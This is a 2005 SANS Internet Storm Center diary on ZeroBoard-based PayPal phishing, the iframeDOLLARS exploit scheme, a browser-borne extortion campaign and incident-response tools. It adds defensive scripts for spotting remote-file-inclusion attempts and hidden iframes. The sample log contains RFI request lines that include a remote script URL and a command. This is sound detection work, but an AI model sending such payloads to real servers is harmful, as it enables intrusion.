
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-05-23



eBay/Paypal Phishing; Shame on that prophet; iframeDOLLARS; Cyber Extortion; OSX hardening; Incident Responder Analysis Tools

Published: 2005-05-23
Last Updated: 2005-05-24 02:15:41 UTC
by William Salusky (Version: 1)

eBay/Paypal phishing via vulnerable ZeroBoard software



While the Internet Storm Center has certainly been receiving an increasing number of eBay and Paypal phishing reports, there is now supporting evidence that identifies a particular attack vector responsible for at least a subset of this growing phishing email variant. Both the delivery of the phishing email and the website set up to harvest user credentials are being accomplished through a PHP file-inclusion attack on web servers running vulnerable versions of the ZeroBoard bulletin board software. A <A HREF="http://www.securityfocus.com/archive/1/387076">vulnerability disclosure</A> for ZeroBoard versions 4.1pl5 and prior was posted to bugtraq on Jan 13 2005. The author has apparently not provided an official patch, but public workarounds are included in the bugtraq disclosure. A personal recommendation: please check all of your Internet accessible hosts for the existence of ZeroBoard. Being on the receiving end of this phish is annoying, but it's that much worse knowing that people are actively falling for this scam. Responsible hosting providers and web administrators: there are even multiple Nessus plugins, ID#s 16059, 16178 and 17199, for those who would like to automate their checks.
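Beyond the Nessus plugins, the other place a hosting provider can look is the web server's own access log: a PHP file-inclusion attack of the kind described above leaves a request whose query string carries an absolute URL to the attacker's payload. The following is an illustrative detection script added to this diary entry; it is not ISC or ZeroBoard code. The log lines are constructed with documentation-range addresses, and the parameter names in them (dir, url) are invented: do not assume which parameter a vulnerable include() actually reads.

```python
"""Flag likely PHP remote-file-inclusion (RFI) attempts in Apache combined-format
access logs.

Illustrative code added to this diary entry; it is not ISC or ZeroBoard code.
The log lines are constructed, and the parameter names in them (dir, url) are
invented: do not assume which parameter a vulnerable include() actually reads.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log: the request line is what we care about; referer and
# user-agent, if present, are left unparsed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# An RFI payload is a query value that is itself an absolute URL, e.g.
#   index.php?dir=http://203.0.113.9/cmd.txt?
# (the trailing '?' makes the server append its own suffix as a query string).
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def rfi_indicators(target, own_hosts=frozenset()):
    """Return (param, value) pairs whose value is an absolute URL pointing at a
    host other than our own. Only query values are examined, so a path that
    merely contains 'http://' is not flagged."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not REMOTE_SCHEME_RE.match(value):
            continue
        host = (urlsplit(value).hostname or "").lower()
        if host not in own_hosts:
            hits.append((name, value))
    return hits


def scan_log(lines, own_hosts=()):
    """Parse each line; return one finding per request carrying an RFI indicator."""
    own = frozenset(h.lower() for h in own_hosts)
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:            # malformed or non-combined-format line: skip
            continue
        hits = rfi_indicators(m.group("target"), own)
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "status": int(m.group("status")),
                "params": hits,
            })
    return findings


def sources_by_count(findings):
    """Client IPs ranked by number of flagged requests: the list to block or report."""
    return Counter(f["ip"] for f in findings).most_common()


# Constructed sample log (documentation-range IPs); not real traffic.
SAMPLE_LOG = [
    '10.1.2.3 - - [23/May/2005:10:14:02 +0000] "GET /bbs/index.php?id=news HTTP/1.1" 200 5123',
    '198.51.100.7 - - [23/May/2005:10:14:09 +0000] "GET /bbs/index.php?dir=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 812',
    '198.51.100.7 - - [23/May/2005:10:14:11 +0000] "GET /bbs/index.php?dir=http://203.0.113.9/cmd.txt?&cmd=uname HTTP/1.1" 200 943',
    '10.1.2.4 - - [23/May/2005:10:15:00 +0000] "GET /bbs/link.php?url=http://www.example.org/ HTTP/1.1" 302 0',
    'this line is not in combined format',
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG, own_hosts=("www.example.org",))
    for f in found:
        print(f["ip"], f["ts"], f["status"], f["params"])
    print(sources_by_count(found))
```

The own_hosts list matters: a board that legitimately redirects through a parameter (the link.php line above) will otherwise show up as a false positive, and a 200 response to a flagged request is worth more attention than a 404, since it suggests the include actually ran.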

Shame on that prophet



As silly as I believe this next report is, it may very well lead to financial loss via the baited harvesting of Paypal user credentials. The Storm Center received a report from D. Craig Rich about a website at www dot prophetyaweh dot com that recommends new paying subscribers use the same user id and password that they use on Paypal. <SARCASM>Oh Really? I'm into UFO's and such, so here's my $7.95(USD), and while you're at it, just help yourself to the rest of my account balance.</SARCASM> Notice we did not link to the site from this diary entry, so please do yourself a favor and don't bother visiting it. Recommendation: Never reuse passwords between sites. You never know who has access to your data.

iframeDOLLARS dot biz partnership maliciousness



After fellow Storm Center handler Tom Liston's investigation into a report received today from a SANS ISC reader named Checker, we find ourselves examining what appears to be an awful business practice: the wholesale attempted exploitation, via multiple vulnerabilities, of any Internet Explorer client that happens to visit a 'partner' in this business venture. The exploits are hosted via hundreds of unique URLs on the website at www dot iframedollars dot biz, including the <A HREF="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-014.asp"> (MS03-014) MHTML (.chm) exploit</A>, the <A HREF="http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx">(MS03-011) Java ByteVerify exploit</A>, the <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx">(MS05-002) MS ANI exploit</A>, and an <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-013.mspx">Mhtredir trojan exploiting MS04-013</A>. Successful exploitation of a browser results in the installation of at least nine additional samples of malicious code, including backdoors, trojans, and spy/adware. So how much is your compromised workstation worth to website administrators who participate in this revenue generation scheme? A whopping $0.61(USD).
LATE DIARY ADDITION: Michael Ligh wrote in notifying us of his involvement in investigating a compromise that involved an iframedollars partner. His excellent writeup is hosted on <A HREF="http://www.mnin.org/write/2005_trimode.html">Michael's personal website</A>.
The question is: How much satisfaction can one organization achieve by null-routing all traffic to this host at 81.222.131.59?

Answer: You tell us.
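For a web administrator who wants to know whether one of their own pages has become a 'partner' in a scheme like this, the thing to look for is an iframe that is invisible to the visitor and pulls content from a host the site does not own. The script below is an illustrative example added to this diary entry; it is not ISC code and not anything recovered from iframedollars. It assumes the partner placement takes the form of an iframe (the diary does not describe the exact placement), the HTML is constructed with documentation-range addresses, and 'hidden' is judged only from attributes present on the tag itself, not from external stylesheets or scripts.

```python
"""Find iframes in a page that are hidden or pull content from another host,
the shape of a pay-per-install partner placement, and derive the hosts worth
null-routing.

Illustrative code added to this diary entry; not ISC code and not anything
recovered from iframedollars. The HTML is constructed with documentation-range
addresses, and 'hidden' is judged only from attributes present on the tag itself.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

CSS_HIDDEN_RE = re.compile(r'display\s*:\s*none|visibility\s*:\s*hidden', re.IGNORECASE)


def _tiny(dim):
    """True for a width/height of 0 or 1 (px or unitless), the classic 1x1 frame."""
    if dim is None:
        return False
    m = re.match(r'\s*(\d+)', dim)
    return bool(m) and int(m.group(1)) <= 1


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":                      # HTMLParser lowercases tag and attribute names
            self.iframes.append({k: (v or "") for k, v in attrs})


def suspicious_iframes(html, page_host):
    """Return one record per iframe that is off-site, 1x1/0x0, or CSS-hidden."""
    collector = IframeCollector()
    collector.feed(html)
    page_host = page_host.lower()
    results = []
    for a in collector.iframes:
        src = a.get("src", "")
        host = (urlsplit(src).hostname or "").lower()   # '' for a relative src
        reasons = []
        if host and host != page_host:
            reasons.append("off-site")
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("zero-size")
        if CSS_HIDDEN_RE.search(a.get("style", "")):
            reasons.append("css-hidden")
        if reasons:
            results.append({"src": src, "host": host, "reasons": reasons})
    return results


def hosts_to_block(findings):
    """Distinct off-site hosts from the findings: candidates for a null route."""
    return {f["host"] for f in findings if "off-site" in f["reasons"]}


# Constructed sample page; the two 203.0.113.45 frames play the partner placement.
SAMPLE_HTML = """<html><body>
<h1>Partner site</h1>
<iframe src="/widgets/weather.html" width="300" height="200"></iframe>
<iframe src="http://203.0.113.45/dl/adv.php" width="1" height="1" frameborder="0"></iframe>
<IFRAME SRC="http://203.0.113.45/dl/x.htm" STYLE="display:none"></IFRAME>
<iframe src="http://www.example.com/help.html" width="400" height="300"></iframe>
</body></html>"""

if __name__ == "__main__":
    found = suspicious_iframes(SAMPLE_HTML, "www.example.com")
    for f in found:
        print(f["src"], f["reasons"])
    print("null-route candidates:", sorted(hosts_to_block(found)))
```

Run it over the HTML your own server actually returns to an Internet Explorer user-agent, since a compromised site may serve the placement only to some clients; the off-site hosts it reports are the ones to null-route or, better, to remove from the page.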

Cyber Extortion by client browser exploit



If the iframeDOLLARS business isn't enough, the Storm Center received an <A HREF="http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=194">alert</A> from Dan Hubbard at WebSense Security Labs of a cyber extortion plot that encodes the user's workstation data after the Internet user has presumably fallen prey to the <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS04-023.mspx">Microsoft Internet Explorer HTML Help browser vulnerability (MS04-023)</A>. After the workstation data is encoded, the user is presented with an extortion offer: pay $200.00(USD) to the extorter via an online payment service and receive a tool that decodes the captive data. Windows users, isn't that a good enough reason to check whether you are patched for this and other recent vulnerabilities? Why not kick off a Windows Update after reading the rest of this diary entry?

Additional OSX hardening guide



Following up on the May 22nd diary, which included a link to the NSA OSX hardening guide, John Banghart of the Center for Internet Security wrote in to point out that the CIS OSX hardening guide is available for download from <A HREF="http://www.cisecurity.org">http://www.cisecurity.org</A>.

Incident Responder Malware Capture, Control and Analysis tools



Hey you! Incident Responder! Yeah, You! A few tools in the toolbox that haven't been mentioned here recently, and that I've been having a great amount of success and fun with. For capturing malware I use <A HREF="http://www.mwcollect.org">mwcollect</A>, which has been developed within the German Honeynet Project and is the tool referred to in the Honeynet Project's recent Bots paper. Once I've collected samples and decided that something is interesting enough to examine, quick analysis gains can be had without heavy reverse engineering by performing runtime analysis. I do this in my own Malware Motel (malicious code gets in, but it can't get out), which is just a few slight modifications to the Honeynet Project's <A HREF="http://www.honeynet.org/tools/cdrom">Honeywall</A>. The Honeywall provides data and network controls and gives you as limited a live network environment as you want for analyzing malicious code. The Honeynet Project released the updated next generation of the Honeywall on May 17th 2005.